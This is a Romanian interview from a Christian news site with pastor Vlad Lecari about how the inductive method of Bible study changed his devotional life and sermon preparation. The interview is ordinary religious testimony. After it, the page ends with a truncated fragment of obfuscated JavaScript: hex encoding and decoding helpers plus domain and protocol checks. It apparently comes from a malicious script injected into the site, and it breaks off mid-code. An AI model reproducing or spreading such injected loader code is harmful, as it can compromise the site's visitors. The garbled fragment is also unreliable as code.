„Prin studierea Bibliei după metoda inductivă, am mereu Cuvânt proaspăt de la Domnul”, Vlad Lecari

Pastorul bisericii din satul Coteala, Vlad Lecari, cu mulți ani înainte a făcut cunoștință cu metoda inductivă de studiere a Bibliei, care a fost o mare descoperire pentru el. Această metodă de studiere a Scripturii a avut o influență deosebită asupra vieții și slujirii sale.

Sursa foto: precept,md
Sursa foto: precept,md
  1. Cum și unde ați aflat despre metoda inductivă de studiere a Sfintelor Scripturi?

Despre studierea Sfintelor Scripturi, după metoda inductivă, am aflat de la fratele Vasile Sanduleac, în anul 2002, întâmplător întâlnindu-mă cu el la Bălți. El mi-a reclamat câteva manuale și mi-a făcut invitație la sesiune, dar eu nu am mers la sesiune, fapt pentru care am regretat în următorii ani. Urmărind Moldova Creștină, am văzut afișat invitația la festivalul Precept Ministries. Am acceptat invitația, după care am scris cerere de eliberare de la serviciu și am plecat la festival. Astfel, pentru  prima dată în viață am aflat și am studiat Sfintele Scripturi, utilizând metoda inductivă.

2. Ce v-a interesat cel mai mult în studierea Bibliei după metoda inductivă?

De fiecare dată când citeam Biblia îmi apăreau multe întrebări despre cele citite. Pentru a găsi răspuns la întrebările care mi-au apărut, apelam la comentarii biblice, dar am observat că fiecare autor avea explicația lui și aceasta mă supăra mult. Nu știam explicațiile cărui autor sunt adevărate. Anume acest adevar îl urmăream când m-am confruntat cu metoda inductivă de studiere a Bibliei: dorința de a afla adevărul și ce vrea să spună Dumnezeu prin Cuvântul Său.

3. Cum v-a influențat studierea Cuvântului, folosind metoda inductivă?

Influența acestei metode de studiu biblic a fost minunată. Locurile din Biblie care păreau plictisitoare pentru mine, prin studiu inductiv am început să mă adâncesc în ele. Așa descopeream mari adevăruri. Aici este bucuria mea.

4. Cum a fost influențată slujirea dvs, după ce ați început a studia după metoda inductivă?

Greutatea cu care mă confruntăm în slujire era alcătuirea unei predici. Trebuia să stau multe zile, dezvoltând o temă și în majoritatea cazurilor era fără rezultat, dar prin studierea Bibliei după metoda inductivă întotdeauna am Cuvânt proaspăt de la Domnul. Nu mă simt uscat în acestă privință. Aceasta este o binecuvântare pentru mine.

5. Ce rezultate ați obținut, folosind studierea Scripturii după metoda inductivă?

Ceea ce am obținut prin studierea Bibliei după metoda inductivă este părtășia cu Dumnezeu, o părtășie vie, reală, în care aud clar cum Dumnezeu îmi vorbește personal.

6. Care sunt impresiile dvs despre metoda inductivă de studiere a Sfintelor Scripturi?

Îmi place să studiez Biblia, folosind metoda inductivă și pentru mine aceasta este mana care coboară de la Dumnezeu pentru sufletul meu. Din regiunea unde locuiesc eu foarte mulți creștini critică această metodă. Îmi este milă de ei, vazându-i cum se țin doar de forme și nu simt libertatea Cuvântului lui Dumnezeu. Pentru mine este o desfătare și așa cum spune psalmistul în Psalmul 119:14:

”…mă bucur de parcă aș avea toate comorile”.

Eu cred că niciun creștin, care s-a apropiat serios de Biblie, studiind-o după metoda inductivă, nu a regretat. Motivez pe fiecare slujitor care a auzit despre această metodă, dar încă nu a studiat Biblia, folosind această metodă, să se silească și să nu piardă timpul. Scriptura spune:

”Gustași și vedeți cît de bun este Domnul”.

Anume prin aceasta metodă guști Cuvântul lui Dumnezeu. Slăvit să fie Domnul!

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "moldovacrestina.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e